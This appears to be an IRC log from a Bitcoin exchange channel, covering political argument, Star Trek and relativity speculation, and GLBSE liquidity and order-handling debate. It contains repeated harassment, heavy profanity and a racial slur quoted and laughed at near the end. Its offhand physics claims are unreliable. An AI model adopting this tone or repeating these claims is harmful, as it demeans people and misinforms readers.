It's against human nature to work together when we can be seperated so easily. Sep 22 05:12:40 you're either for the united states or you're against it Sep 22 05:12:44 there IS no party. Sep 22 05:13:01 <__Atlas__> ......... Sep 22 05:13:18 <__Atlas__> Well, I'm against it, my friend. The federal government can go fuck it self. Sep 22 05:13:21 <__Atlas__> itself* Sep 22 05:13:34 __Atlas__: the federal government isnt the united states Sep 22 05:13:43 they are only employees that serve the public at large Sep 22 05:13:46 <__Atlas__> Well, I'm glad to hear that much. Sep 22 05:13:51 Diablo-D3> there IS no party. < like a west coast party? Sep 22 05:14:02 when I say the united states, I mean the people who live here Sep 22 05:14:22 we have a diverse population in every meaning of the word, yet we all deserve the same basic freedoms Sep 22 05:15:05 Smoovious: whos conditioned now? Sep 22 05:15:30 everyone deserves an education, a job, food on the table, a roof over their head Sep 22 05:15:37 It's up to us to rise above our genetic programing and work as a group. This is unlikely. Sep 22 05:15:40 <__Atlas__> Deserve Sep 22 05:15:44 but the government continues to mismanage support services that make these happen Sep 22 05:15:48 <__Atlas__> Deserve means an obligation Sep 22 05:16:00 Smoovious: they have the right to _have_ it Sep 22 05:16:10 <__Atlas__> Are people obligated to give others certain things? Sep 22 05:16:18 <__Atlas__> Are people inherently slaves to others? Sep 22 05:16:23 if someone wants to get up at 6 a clock in the morning and work 8-10 hours a day, yes, they HAVE that right Sep 22 05:16:48 <__Atlas__> Positive rights are basically calls for forced labor. Sep 22 05:16:58 Smoovious: but thats the thing Sep 22 05:17:11 There's an obligation to your fellow man. It takes a psycho to say otherwise absolutely. Sep 22 05:17:17 millions of people have CHOSEN that, yet the government continues to destroy any chance they have at a job Sep 22 05:17:24 <__Atlas__> OneMiner: Call me a psycho. I am no slave. Sep 22 05:17:35 <__Atlas__> I will help others because I WANT TO Sep 22 05:17:39 Slave = those how help others in need? Sep 22 05:17:44 <__Atlas__> Not because God or the government or some morality tells me to Sep 22 05:17:50 most people in the US are employed by a small business Sep 22 05:17:53 <__Atlas__> OneMiner: If it's by force, yes. Sep 22 05:18:02 why does the government continue to fuck over small businesses Sep 22 05:18:05 <__Atlas__> If you will kill me because I don't feed you, it's slavery. Sep 22 05:18:19 __Atlas__: yeah, positive rights seem icky, to say the least Sep 22 05:18:30 if the majority of people have chosen to work and are unable to get a job, why doesnt the government just step out of the way and let the system work Sep 22 05:18:33 you cant answer that Smoovious Sep 22 05:19:00 it isnt because they're evil or greedy or any of the shit Libertarians say, its because they're incompetent Sep 22 05:19:31 but they arent in charge of the people Sep 22 05:19:35 How do you describe what you live in? What is it that lets us live in such comfort other than a society? Sep 22 05:19:42 their job is to make sure the gears of the system continue turning, nothing more Sep 22 05:19:46 they're the janitors of society Sep 22 05:20:05 when they believe that they are anything more than that, then we have a problem Sep 22 05:20:06 If it is a socitety then that does imply an obligation, in no uncertain terms. Sep 22 05:20:11 and I think we do, indeed, have a problem Sep 22 05:20:17 <__Atlas__> OneMiner: I don't need other people. Other people shouldn't need me. Sep 22 05:20:26 <__Atlas__> I can go ahead and dig roots out of the ground if I need to. Sep 22 05:20:34 I have no need for people with this mindset. Sep 22 05:20:34 <__Atlas__> The Earth provides enough on its own. Sep 22 05:20:45 <__Atlas__> Well, I am sorry I am not your house wife. Sep 22 05:20:54 Smoovious: you may think that Im wrong here, but Im not. people have a right to live a normal average life, if nothing else. Sep 22 05:21:01 You could give me millions of em, what are they good for __Atlas__? Sep 22 05:21:08 Smoovious: the constitution does not give us our rights, _we_ give us our rights Sep 22 05:21:15 its something every American has to agree to to live here Sep 22 05:21:30 you help make society function, and we all work towards this goal along side you Sep 22 05:21:54 <__Atlas__> OneMiner: I value choice. I value living on my own terms. You value guaranteed comfort and security. Sep 22 05:22:04 there is no communism or socialism or any other such bullshit Sep 22 05:22:37 I value the collective good. I value our shared ideals. I'd put you out if you were on fire and I wouldn't ask for anything in return. Sep 22 05:22:58 Smoovious: not at all, because theres no sides to the issue at all Sep 22 05:23:02 <__Atlas__> OneMiner: I would do the same but not out of any obligation. Sep 22 05:23:03 [GLBSE] [PPT.B] 30 @ 0.32 = 9.6 BTC [+] Sep 22 05:23:04 either we all succeed, or none of us do. Sep 22 05:23:06 <__Atlas__> but because I value you. Sep 22 05:23:11 <__Atlas__> You living would be my profit. Sep 22 05:23:22 <__Atlas__> It would be something in return for me: You living. Sep 22 05:23:26 like I said, there is no communism or socialism Sep 22 05:23:34 [GLBSE] [OBSI.HRPT] 1 @ 0.09444999 BTC [+] Sep 22 05:23:39 its how human society forms itself naturally Sep 22 05:23:41 <__Atlas__> Life in general to me is selfish profit. Sep 22 05:23:51 <__Atlas__> There is no sacrifice in willing actions. Sep 22 05:23:56 <__Atlas__> None. Sep 22 05:24:02 <__Atlas__> It's not zero sum. Sep 22 05:24:12 Smoovious: am I a communist just because I once gave a starving person food? no, it means Im a human being. Sep 22 05:24:52 I do. Sep 22 05:24:55 its not collectivism either. Sep 22 05:25:04 <__Atlas__> It's all semantics. Sep 22 05:25:19 <__Atlas__> I think people would end up agreeing if we had a better vocabulary. Sep 22 05:25:22 the best possible government takes the best features of EVERYTHING Sep 22 05:25:41 the best of communism, the best of socialism, the best of democracy Sep 22 05:25:45 <__Atlas__> The best possible governance is multiple governments competing for citizens. Sep 22 05:25:54 the US government is slowly turning into this Sep 22 05:26:01 __Atlas__: in a way, but we almost had that Sep 22 05:26:07 thats what states rights were Sep 22 05:26:40 <__Atlas__> The Articles of Confederation were a beautiful thing. The British Empire hated it. Sep 22 05:26:56 It is in my interest to not have starving people outside my door. It's in my interest to protect the weak. It's in my interest to compromise on my beliefs and values to a degree. Sep 22 05:27:10 OneMiner: yes. Sep 22 05:27:31 <__Atlas__> OneMiner: It takes a lot for many state that. I admire you. Sep 22 05:27:44 <__Atlas__> I desire the same ends. Sep 22 05:27:44 and it is in your interest that NO ONE starves, and NO ONE who is weak is unprotected, and NO ONE has to be FORCED to compromise on their beliefs Sep 22 05:28:22 <__Atlas__> It's in my interest to empower the weak, to arm them and to put them on equal footing with the powerful. Sep 22 05:28:28 <__Atlas__> Not to keep them weak Sep 22 05:28:31 __Atlas__: yes Sep 22 05:28:32 <__Atlas__> or make them dependent on the strong. Sep 22 05:28:33 I agree Sep 22 05:28:34 <[\\\]> oh shut up Sep 22 05:28:38 ++ Sep 22 05:28:43 i was typing o get the hell out Sep 22 05:28:44 <[\\\]> I've been in here for three lines and you've already pissed me off Sep 22 05:28:48 but ofcouse dashy beat me to it Sep 22 05:28:53 heh. Sep 22 05:28:58 <[\\\]> jesus fuck Sep 22 05:28:58 he has a point though Sep 22 05:29:00 <[\\\]> go back to hiding Sep 22 05:29:05 <__Atlas__> \\\: So the weak should remain weak? Sep 22 05:29:11 <[\\\]> no, you should shut the hell up Sep 22 05:29:20 <__Atlas__> Why do you disagree? Sep 22 05:29:27 <[\\\]> I didn't agree or disagree Sep 22 05:29:31 Smoovious: yes, but imagine this... what if everything the government has to do could be ran on just 10% of your income. Sep 22 05:29:31 <[\\\]> I said you should shut the hell up Sep 22 05:29:35 <[\\\]> there is a difference Sep 22 05:29:40 <__Atlas__> Well your suggestion is duly noted. Sep 22 05:29:54 <[\\\]> the initial statement isn't a suggestion Sep 22 05:30:19 <__Atlas__> You are free to put me on ignore. Sep 22 05:30:22 Smoovious: no more sickness, no more starving huddled masses, no more insane competition for resources among the weak and the poor Sep 22 05:30:25 <[\\\]> I dont need to put you on ignore Sep 22 05:30:31 <[\\\]> you should shut the hell up Sep 22 05:30:38 <__Atlas__> I shouldn't. Sep 22 05:30:42 [GLBSE] [BITCOINRS] 2 @ 0.05 = 0.1 BTC [+] Sep 22 05:30:44 <__Atlas__> Because I am the boss here. Sep 22 05:30:47 Smoovious: everyone gets an education, everyone gets to spend their lives doing something that is meaningful to them Sep 22 05:31:05 <__Atlas__> \\\: So, should the weak be kept weak and dependent? Sep 22 05:31:07 yet thats what they currently do Sep 22 05:31:10 <[\\\]> shut the hell up Sep 22 05:31:13 <__Atlas__> or should they be made powerful? Sep 22 05:31:26 <__Atlas__> Should they be free and capable? Sep 22 05:31:30 Smoovious: everyone has a right to live an honest life. Sep 22 05:31:30 <__Atlas__> or weak and dependent? Sep 22 05:31:45 Smoovious: that goes beyond government or religion or any other Earthly concept. Sep 22 05:32:05 its a right given to us by whatever creator you believe in. Sep 22 05:32:38 the federal government is not a nameless faceless organization Sep 22 05:32:41 they are people too. Sep 22 05:32:59 Go ahead and make fun but I think Star Treak pained an achievalbe future. Beyond money and beyond position to a degree. It's within our powers to have world peace and whatever else we want. Not in our lifetimes but not so much longer than that ether. Sep 22 05:33:04 [MPEX] [S.MPOE] 8100 @ 0.00039777 = 3.2219 BTC [-] Sep 22 05:33:15 OneMiner: yes, but look at what it took Sep 22 05:33:23 a third world war that wiped out 2/3rds of the world population Sep 22 05:33:26 the star trek future depends on free resources Sep 22 05:33:30 they had replicators Sep 22 05:33:33 real simple Sep 22 05:33:39 replicators were not invented until after kirk. Sep 22 05:33:49 <__Atlas__> Peace: http://en.wikipedia.org/wiki/Mutual_assured_destruction Sep 22 05:33:54 <[\\\]> Shut the hell up Sep 22 05:33:59 kirk knew what money was and picard didn't Sep 22 05:34:00 Replicators are not free. They take time to make and design. Hard word would have to go into it. Sep 22 05:34:02 so what Sep 22 05:34:13 replicators use a LOT of energy to run Sep 22 05:34:18 <[\\\]> proof? Sep 22 05:34:20 they arent free Sep 22 05:34:25 <__Atlas__> \\\: I wish we could have a discussion. I'm interest in your disagreement. Sep 22 05:34:29 <__Atlas__> interested* Sep 22 05:34:32 [\\\]alines or magnets Sep 22 05:34:34 Smoovious: no, they figured out how to create mass out of nothing Sep 22 05:34:40 which is extremely dangerous when you think about it Sep 22 05:34:45 *aliens Sep 22 05:34:45 <[\\\]> Shut the hell up Sep 22 05:34:46 s/word/work Sep 22 05:34:57 <__Atlas__> Shut the hell up Sep 22 05:35:01 <[\\\]> Shut the hell up Sep 22 05:35:04 Diablo-D3 magnets Sep 22 05:35:06 <__Atlas__> Shut the hell up Sep 22 05:35:07 <[\\\]> Shut the hell up Sep 22 05:35:13 Shut up the hell Sep 22 05:35:14 <__Atlas__> Shut the hell up Sep 22 05:35:15 <[\\\]> Shut the hell up Sep 22 05:35:17 Smoovious: well, out of energy Sep 22 05:35:24 trewl iz trewlin Sep 22 05:35:30 <[\\\]> well this is fun Sep 22 05:35:40 Smoovious: it abuses the same laws of physics that the holodeck uses to give photons mass Sep 22 05:35:40 Smoovious magnets Sep 22 05:35:42 <[\\\]> lies! Sep 22 05:35:44 its not free energy Sep 22 05:35:55 nonono. This is fun. Who the hell reads this chan anyways? Sep 22 05:36:00 but they're sitting on a reactor that produces more energy than the modern day earth produces yearly. Sep 22 05:36:03 <[\\\]> are we really debating fucking star trek personality? Sep 22 05:36:07 OneMiner: serious investors Sep 22 05:36:10 a matter/anti-matter reactor Sep 22 05:36:15 <[\\\]> err, technology Sep 22 05:36:28 [\\\] yes, magnets Sep 22 05:36:35 Smoovious: what kirk had would be enough to run the entire planet Sep 22 05:36:39 <__Atlas__> Yes, the means to acquire energy can be made efficient enough to where it's considered "free" Sep 22 05:36:45 <[\\\]> jcpham: I'm gonna poke you in the eye with a magnet Sep 22 05:36:46 <__Atlas__> It's only a matter of time. Sep 22 05:36:49 jcpham I started reading about all the "investment options" good lord.... There's too much material. Sep 22 05:36:55 Smoovious: compared to what we have, its free. Sep 22 05:37:31 Smoovious: well, thats the thing, we dont even know what mass exactly is yet Sep 22 05:37:36 <[\\\]> no, it doesn't Sep 22 05:37:40 <[\\\]> mass if free Sep 22 05:37:42 <[\\\]> just ask your mom Sep 22 05:37:49 Smoovious: we just dont know how to convert energy back into mass yet Sep 22 05:37:50 assbot needs to start laying down the banhammer on atlas more Sep 22 05:38:26 Smoovious: hell, we just only recently proved the existence of the subatomic particle that makes matter matter. Sep 22 05:38:31 <__Atlas__> What is free? Ask yourself that. Sep 22 05:38:32 Fusion is pretty close. That could bridge the gap. Sep 22 05:38:36 well once we fly around space will have free energy, or nearly free Sep 22 05:38:41 <__Atlas__> Free only means acquiring something with little to no cost. Sep 22 05:38:43 because it's likea requiremnet Sep 22 05:38:59 to travel from star system to sytem Sep 22 05:39:01 the thing is, energy production is a run away process Sep 22 05:39:17 look at what a few solar manufacturing plants did.... their biggest drain on resources is electricity Sep 22 05:39:26 many plants have panels _from that plant_ on the roof. Sep 22 05:39:55 This one planet thing is for the birds, now that you brought it up. Gotta get outta' here, if it's the last thing we ever do. Sep 22 05:40:03 How would DMC mine bitcoins from a starship Sep 22 05:40:06 theoretically Sep 22 05:40:07 OneMiner: I agree Sep 22 05:40:21 OneMiner: I would like to retire and live the rest of my life on mars, to be honest Sep 22 05:40:23 jcpham: good question' Sep 22 05:40:42 jcpham: star trek has large scale quantum computing Sep 22 05:40:43 assume the system is still earthly Sep 22 05:40:53 and you have to relay commands back home Sep 22 05:41:03 oh, you mean the speed of light problem? Sep 22 05:41:10 sure Sep 22 05:41:16 you cant solve it yet. Sep 22 05:41:19 Mars is the only option. For everything. One rock from space could take us out. Bunkers be damned, that's no protection. Sep 22 05:41:20 pretty poor mining outfit Sep 22 05:41:26 8 min getworks Sep 22 05:41:28 star trek solved it by putting normal communications in warp bubbles Sep 22 05:41:35 the bubble collapses near the destination Sep 22 05:41:39 Smoovious: chain competitions Sep 22 05:41:59 you'd basically need a whole new chain for mars Sep 22 05:42:11 and manually transfer wealth between them using off-chain exchanges Sep 22 05:42:16 or some type of interstellar backbone Sep 22 05:42:27 jcpham: doesnt matter, the ten minute block lag is too much Sep 22 05:42:29 an internet of space Sep 22 05:42:34 takes 14 minutes to get a signal from mars most of the time Sep 22 05:42:52 I was totally serious BTW. Star Treak could be real. If you think not, it's a failure of the imagination. We stand on the edge of so many things. Sep 22 05:43:02 so bitcoin is totally terrestrial Sep 22 05:43:06 we just solved that Sep 22 05:43:13 OneMiner: I agree Sep 22 05:43:23 the only reason we havent solved every problem, basically, is lack of imagination Sep 22 05:44:01 <__Atlas__> Smoovious: You can move space itself as fast as you want. Sep 22 05:44:35 well, thats what a star trek warp drive is Sep 22 05:44:42 the ship is standing still in local space Sep 22 05:44:50 local space is inside of a hyperspace bubble Sep 22 05:44:58 the bubble is moving at superluminal speeds Sep 22 05:44:59 it's a source of energy we can barely imagine Sep 22 05:45:10 yeah, it probably can be done, but it takes a fucking shitload of energy Sep 22 05:45:11 is what it is Sep 22 05:45:29 metric shitload, before anyone asks Sep 22 05:45:35 Smoovious the thing is it's all relative. The light speed is relative to light speed. Time slows for those who go so fast. So the same thing is happening to that light. It can't overtake light. Sep 22 05:46:10 OneMiner: yes, but theres another thing Sep 22 05:46:10 <[\\\]> All this geekery makes me horny Sep 22 05:46:18 photons do not have "a speed" Sep 22 05:46:28 they just go as fast as possible Sep 22 05:46:29 <__Atlas__> Perception varies Sep 22 05:47:07 so if you're traveling at 80% of the speed of light, the photons are already at the speed of light on creation Sep 22 05:47:17 we're talking more energy than say a sun, right Sep 22 05:47:23 matter + anti-matter Sep 22 05:47:33 jcpham: no, the entire output of the sun could probably power a warp drive for a short period Sep 22 05:47:43 but then we're looking at dyson collection arrays Sep 22 05:47:45 the science behind that reaction is untold energies Sep 22 05:48:03 jcpham: we've done matter/antimatter reactions in the lab already Sep 22 05:48:09 we know what it does Sep 22 05:48:15 and yes, its bombastic. Sep 22 05:48:19 i'm behind on my science Sep 22 05:48:29 you're like 20 years behind on your science Sep 22 05:48:30 There's no way we know of to pack that much energy into anything. Because you'd have to accelerate the mass of your fuel too. It's impossible based on what we know now. Not that that means mutch. Sep 22 05:49:02 OneMiner: theres another problem Sep 22 05:49:07 you can not go ftl with conventional physics Sep 22 05:49:18 Bah, everything is relative. That has to do with human society too. Sep 22 05:49:38 since time effectively stops from the perspective of outside the ship, you never burn that last ounce of fuel to go as fast as the speed of light Sep 22 05:49:51 Ya, FTL is FTL AFAIK. :P Sep 22 05:50:14 the interesting thing is, if you fired of photons, you'd never see them get reflected back Sep 22 05:50:23 you'd essentially be chasing them dead on Sep 22 05:50:31 lol Smoovious :) Sep 22 05:50:36 the REAL question is Sep 22 05:50:46 lets say you were at 99.9~% of the speed of light Sep 22 05:50:55 you fired a flashlight from the rear of the ship Sep 22 05:51:10 would the photons stand still? Sep 22 05:51:20 or would they appear to go off at twice the speed of light from your perspective Sep 22 05:51:40 Smoovious: you're already at the speed of light Sep 22 05:51:47 From my perspective they would go shooting off at the speed of light. Sep 22 05:51:51 and they're now moving in the opposite direction Sep 22 05:52:31 ship <---- ----> photons Sep 22 05:52:36 I think.... Don't hurt me! Sep 22 05:53:08 so would they stand still from the perspective of an outside viewer, or shoot off at twice the speed of light from the perspective of someone on the ship Sep 22 05:53:40 we dont even know where the center is Sep 22 05:54:03 we havent seen any obvious structures in the universe that would point towards expansion Sep 22 05:54:05 Smoovious we are. There are plenty of stars that are outside our field of view. Sep 22 05:54:11 Smoovious: the speed of light is local, btw Sep 22 05:54:21 OneMiner: yes, but they're so far away they're back in time Sep 22 05:54:37 due to the speed of light being the closest thing we have to a police box. Sep 22 05:54:49 And we will never see them. They are moving away too fast. Sep 22 05:55:25 Smoovious: 99.9~ speed of light Sep 22 05:55:40 Smoovious: yes, but thats the interesting problem with large scale physics Sep 22 05:55:48 the universe could already be contracting and we wouldnt quite know it Sep 22 05:55:58 we're looking at really old data Sep 22 05:56:07 fucking light cones, how do they work Sep 22 05:56:10 <__Atlas__> I am led to believe we know very little about our universe. Sep 22 05:56:10 We are always looking at old things. No matter what. Sep 22 05:56:16 Smoovious: well thats another thing Sep 22 05:56:21 is the universe even flat? Sep 22 05:56:35 it could be a curved spacetime field Sep 22 05:56:36 yes, like the earth Sep 22 05:56:59 We don't know much. But we have some of it. We just started really. Sep 22 05:57:21 we know less than a fraction of a percent of whats required to answer any worthwhile questions Sep 22 05:57:27 Smoovious: oh its not, we already know that Sep 22 05:57:41 <__Atlas__> I believe there are other planes of perception we do not even consider. Sep 22 05:57:48 the macro universe is at least 10 dimensions, depending on how you define macro Sep 22 05:57:51 <__Atlas__> Perception itself has yet to be quantified. Sep 22 05:58:42 and m-theory managed to combine all the superstring theories into the same theory, since they're all essentially mirror images of the same math Sep 22 05:59:04 [MPEX] [S.MPOE] 5674 @ 0.00039308 = 2.2303 BTC [-] Sep 22 05:59:10 and thats 11 dimensional Sep 22 05:59:22 I think one of the alternate theory families is up to like 28 or some shit Sep 22 06:00:03 It's safe to say that the knowledge we gain in the future will be beyond anything we know or realize today. Sep 22 06:00:26 Smoovious: I dont think there are alternate realities Sep 22 06:00:30 could be concurrent ones, though Sep 22 06:00:41 actual parallel realities instead of the usual bullshit scifi shit Sep 22 06:01:06 <__Atlas__> " Superstring theory, M-theory and Bosonic string theory respectively posit that physical space has 10, 11 and 24 dimensions. These extra dimensions are said to be spatial. However, we perceive only three spatial dimensions and, to date, no experimental or observational evidence is available to confirm the existence of these extra dimensions. A possible explanation that has been suggested is that space acts as if it were "cur Sep 22 06:01:07 <__Atlas__> led up" in the extra dimensions on a subatomic scale, possibly at the quark/string level of scale or below." Sep 22 06:01:14 <__Atlas__> It's all religion Sep 22 06:01:37 BS Sep 22 06:01:41 Smoovious: we know what a black hole is Sep 22 06:02:30 That's science. It's a theory and it's unconfirmed. Calling it a religion is an affront to all who work on expanding all we know. Sep 22 06:03:12 well, calling it a religion isnt wrong Sep 22 06:03:19 <__Atlas__> Yeah, I take it back Sep 22 06:03:22 one of the most holy churches in the world is CERN. Sep 22 06:03:28 <__Atlas__> These theories are actually pretty reasonable Sep 22 06:03:36 <__Atlas__> Especially when it comes to the forces in our universe Sep 22 06:03:54 if God created the entire Universe, Science really is the ultimate religion Sep 22 06:04:09 I know a person who donates to CERN. I approve of this. Sep 22 06:04:37 <__Atlas__> I like to think we are all different thought processes that form the collective consciousness of the Universe and/or God Sep 22 06:04:38 nefario: do you consider the lack of liquidity to be a problem for glbse? Sep 22 06:04:43 Diablo-D3 ++++ infinity Sep 22 06:04:56 yes Sep 22 06:05:11 are there plans to incentivize new liquidity? Sep 22 06:05:13 of course if there is a lack of liquidity it's a problem Sep 22 06:05:16 yes Sep 22 06:05:19 legitimise Sep 22 06:05:25 I don't think that's the issue Sep 22 06:05:32 it's a big issue Sep 22 06:05:42 it's not what stops most people I know from keeping coins on there Sep 22 06:05:43 <__Atlas__> I think the issue is Bitcoin hasn't stopped going up yet Sep 22 06:05:53 copumpkin: what stops people? Sep 22 06:06:05 The issue is the amount of investment options and the ammount of time people are willing to invest in an investment. Sep 22 06:06:24 the ammount of time people are willing to invest in an investment. << scary. Sep 22 06:06:29 the fact that coins are tied up for an order, and can't be used elsewhere during that period Sep 22 06:06:40 thats solved by margin Sep 22 06:06:48 yes, but that isn't there Sep 22 06:06:52 not yet Sep 22 06:07:07 you considering maker/taker fee structures? Sep 22 06:07:08 there is a lot I'm not able to talk about now Sep 22 06:07:38 as we go through the process of legitimizing Sep 22 06:08:08 we'll be bringing on real businesses and companies Sep 22 06:08:10 I think coins should be tied up in an order. Otherwise, what good is that order? Fake orders via shell accounts (correct term?) would be a huge problem. Sep 22 06:08:17 and investors in the real world, outside of bitcoinland Sep 22 06:08:47 this used to be a problem in GLBSE 1.0 Sep 22 06:09:14 Going for a smoke. Don't talk about anythin interesting. Sep 22 06:09:20 anything Sep 22 06:09:42 OneMiner: I'm just explaining the disincentive to leave orders there Sep 22 06:09:55 OneMiner: it's a legitimate one, but there need to be sufficient incentives to make me want to do that Sep 22 06:10:16 considering that an exchange thrives on liquidity, it's in nefario's interest (and ours, as a market) to make sure that as many people as possible want to do that Sep 22 06:10:17 !ticker asicminer Sep 22 06:10:18 Still. To be legit the cash has to be on the table. Anything else is [GLBSE:ASICMINER] [Bid: 0.1180001] [Ask: 0.121889] [Spread: 0.0038889] [Last: 0.119] [24hVol: 203.01535716] [7dAvg: 0.1167809] Sep 22 06:10:35 as it stands, people despair over "massive drops" in "price" on glbse Sep 22 06:10:40 which are caused by 100-btc transactions Sep 22 06:10:42 which is ridiculous Sep 22 06:10:47 copumpkin: existing markets also run like this, if you want more liquidity you get margin Sep 22 06:11:06 I can sell 100 btc of even some of the most liquid stocks on glbse, and the price will crash by a major percentage Sep 22 06:11:14 sure Sep 22 06:11:19 that means that last price is effectively meaningless Sep 22 06:11:19 GLBSE hasn't got margin Sep 22 06:11:21 which I keep telling people :) Sep 22 06:11:31 illiquid markets don't have meaningful prices Sep 22 06:11:33 and it's not something we're going to be providing ourselves Sep 22 06:11:39 so price should not be a consideration to people Sep 22 06:11:44 due to the liability Sep 22 06:11:54 we'll be taking someone from outside to provide it Sep 22 06:12:07 nefario: when will glbse allow me to make unlimited bids? Sep 22 06:12:10 I dont mean margin Sep 22 06:12:13 but we need to be legitimised first Sep 22 06:12:21 Diablo-D3: unlimited bids? Sep 22 06:12:24 nefario: you gave up on the lending of assets thingimagig? Sep 22 06:12:31 no Sep 22 06:12:33 margin provided by the exchange infrastructure is pretty safe, since you have the power to throw margin calls in Sep 22 06:12:35 nefario: bids stop being valid when I run out of money Sep 22 06:12:36 there are problems with it Sep 22 06:12:41 if it's provided externally without special hooks, that's dangerous Sep 22 06:12:43 problems that are not technicalk Sep 22 06:12:46 technical Sep 22 06:13:10 if I lend someone money/assets to trade on glbse, I can get screwed a lot harder than if you lend the same stuff to them Sep 22 06:14:12 margin, lending assets, etc. opens up a whole sleuth of areas that are difficult to deal with from a regulation POV Sep 22 06:14:12 copumpkin: imagine a margin call based on the current order book bids Sep 22 06:14:25 sure, but nefario's in the perfect position to be able to force liquidation, but I am not Sep 22 06:14:53 so he's got effectively no counterparty risk, if he implements the feature correctly Sep 22 06:15:07 that's why you get clearing houses Sep 22 06:15:12 in real markets Sep 22 06:16:06 the problems are not technical Sep 22 06:16:11 they're regulatory Sep 22 06:16:15 heh Sep 22 06:16:18 <[\\\]> who regulates glbse? Sep 22 06:16:22 no one does. Sep 22 06:16:27 not exactly Sep 22 06:16:28 which is 99.9% of the problem Sep 22 06:16:29 right now Sep 22 06:16:38 nefario: funny you say that, because I've heard nobody complain about that when talking about why they don't want to leave open orders on glbse Sep 22 06:16:39 it's looking like the FSA will Sep 22 06:16:44 FSA? Sep 22 06:16:54 Smoovious: you CAN fake liquidity Sep 22 06:16:59 if I'm scared of glbse's legitimacy or lack of regulation, I don't use it Sep 22 06:17:04 Financial Services Authority Sep 22 06:17:09 if I don't mind that, but don't leave open orders on it, the problem is elsewhere Sep 22 06:17:14 Smoovious: if I have 10 BTC, I cannot place 20 BTC of bids Sep 22 06:17:22 but I should be able to Sep 22 06:17:39 if you want to provide leverage, you need technical features to support it Sep 22 06:17:46 why, as long as my account balance is >0, the bids are active Sep 22 06:18:06 Diablo-D3: if we allow as many bids as people want, each bid being up to the value of the BTC they hold, and remove them when the amount of BTC available falls Sep 22 06:18:08 you might not do the actual lending, but whoever does needs those features Sep 22 06:18:16 we get a shit load of spammy orders Sep 22 06:18:19 Smoovious: they're active until someone depletes my reserve Sep 22 06:18:22 <[\\\]> Smoovious, it worked for gox for over a year Sep 22 06:18:26 <[\\\]> bids aren't purchases Sep 22 06:18:30 <[\\\]> bids are offers to buy Sep 22 06:18:36 yeah what imsaguy said Sep 22 06:18:38 they ARE real orders Sep 22 06:18:44 there is just limited supply. Sep 22 06:18:52 <[\\\]> yeah Sep 22 06:18:57 <[\\\]> but you could bid more than you were funded for Sep 22 06:18:59 I would be happy to put all of DMC's spare cash towards every asset I want to provide a floor Sep 22 06:19:02 I had this system open on GLBSE for a while when I tried to move over to the new backend Sep 22 06:19:04 <[\\\]> the bids without funds went inactive Sep 22 06:19:09 the result was TONS of spam bids Sep 22 06:19:14 on loads of assets Sep 22 06:19:18 nefario: whats wrong with spam bids? Sep 22 06:19:21 adds system load Sep 22 06:19:23 what makes a bid a spam bid? Sep 22 06:19:26 it's got a real cost Sep 22 06:19:29 no it doesnt Sep 22 06:19:32 it does Sep 22 06:19:39 when enough people are doing it Sep 22 06:19:41 maybe I should just finish lugh and make my own exchange. Sep 22 06:19:48 go ahead Sep 22 06:19:52 make your own exchange Sep 22 06:19:55 I mean the software Sep 22 06:20:00 OH Sep 22 06:20:01 I sure as hell dont want to _run_ one Sep 22 06:20:02 <[\\\]> Spam bids are better than no bids Sep 22 06:20:08 you mean the easy part about running an exchange Sep 22 06:20:10 the software Sep 22 06:20:12 if you're short on bids, you really don't want to be restricting them Sep 22 06:20:14 <[\\\]> right now, 100 btc will take ANY asset to 0 Sep 22 06:20:22 nefario: you say its easy, yet your software, um, sucks. Sep 22 06:20:23 <[\\\]> that sucks Sep 22 06:20:30 nefario: how do you define a spam bid? Sep 22 06:20:32 [\\\]: thats the maximum there Sep 22 06:20:36 I'm not totaly against multiple orders on the same bitcoin, just mostly. Sep 22 06:20:37 a lot of assets are already AT zero Sep 22 06:20:46 <[\\\]> Smoovious, so be it Sep 22 06:20:50 <[\\\]> something is better than nothing Sep 22 06:21:02 setting up a new disk... speakth thou favorite fs type Sep 22 06:21:07 <[\\\]> its not like they are putting sell orders in on everything at the same exact moment Sep 22 06:21:07 It's a stupidly low bid placed in the hope of catching a mistake someone might have made inputting an order Sep 22 06:21:17 I need to get around to working on lugh's ordered state machine shit Sep 22 06:21:21 thats going to be a pita. Sep 22 06:21:31 nefario: stupidly low bids will stop being effective once depth goes up, which it would anyway Sep 22 06:21:36 so the incentive to place them would go away Sep 22 06:21:39 its non-trivial in languages like erlang Sep 22 06:21:45 in C, blerg. Sep 22 06:21:56 if there are million coins worth of demand above my stupidly low bid, then I won't bother placing my stupidly low bid Sep 22 06:22:02 liquidity problems are solved by expanding the number of buyers in the market and adding margin Sep 22 06:22:08 also, you already have stupidly low bids, and they're only viable due to the lack of liquidity Sep 22 06:22:16 btw, nefario Sep 22 06:22:19 there IS one thing Sep 22 06:22:21 to stop spam bids Sep 22 06:22:24 blerg? were you quoting liz lemon? Sep 22 06:22:25 nefario: most exchanges incentivize liquidity with maker/taker fee structures Sep 22 06:22:36 we have that Sep 22 06:22:36 allow a maximum of x bids, and x bids per asset Sep 22 06:22:42 er, y bids per asset Sep 22 06:22:50 need has market maker :) Sep 22 06:22:50 perhaps the balance isn't right :) Sep 22 06:23:00 0% for the maker Sep 22 06:23:04 0.5% for the taker Sep 22 06:23:05 rebates! Sep 22 06:23:06 :D Sep 22 06:23:13 so I dunno Sep 22 06:23:15 I elect Chaang-Noi as our new market maker Sep 22 06:23:18 The main problem is that the entire bitcoin economy isn't worth more than 120 million. Illiquidity is a natural consequence as far as I can tell (not far). Sep 22 06:23:18 for all glbse securities Sep 22 06:23:19 yeah I'll do that with market makers Sep 22 06:23:20 and why the fuck is steam stuck at saying "updating steam" Sep 22 06:23:31 I WANT TO PLAY BLACK MESA DAMNIT Sep 22 06:23:34 we can call Chaang-Noi The Specialist, if he wants a fancier-sounding title Sep 22 06:23:42 i accept copumkin! :) Sep 22 06:23:47 sweet Sep 22 06:23:54 I for one look forward to meaningful asset prices on glbse Sep 22 06:23:55 copumpkin: but glbse does not have a sign outside syaing dead nigger storage Sep 22 06:23:59 time to has sell and buy every asset at once!!! Sep 22 06:24:15 <__Atlas__> Diablo-D3: I choked Sep 22 06:24:22 <__Atlas__> That was hilarious Sep 22 06:24:22 you should apply my goatse strategy in your market making Sep 22 06:24:26 I'm a master Sep 22 06:24:46 Yum Black Mesa. Sep 22 06:24:58 I havent gotten to play black mesa yet because Ive been busy :< Sep 22 06:25:12 so the goatse strategy, for those of you interested Sep 22 06:25:16 I played a bit. I'm stuck on some platforming.... :/ Sep 22 06:25:31 <__Atlas__> http://online.wsj.com/article/SB10001424052702304203604577394973754427792.html Sep 22 06:25:32 is where you first do a market sell order for all you're worth, then with the proceeds from that, do a market buy order for all you have Sep 22 06:25:37 <__Atlas__> 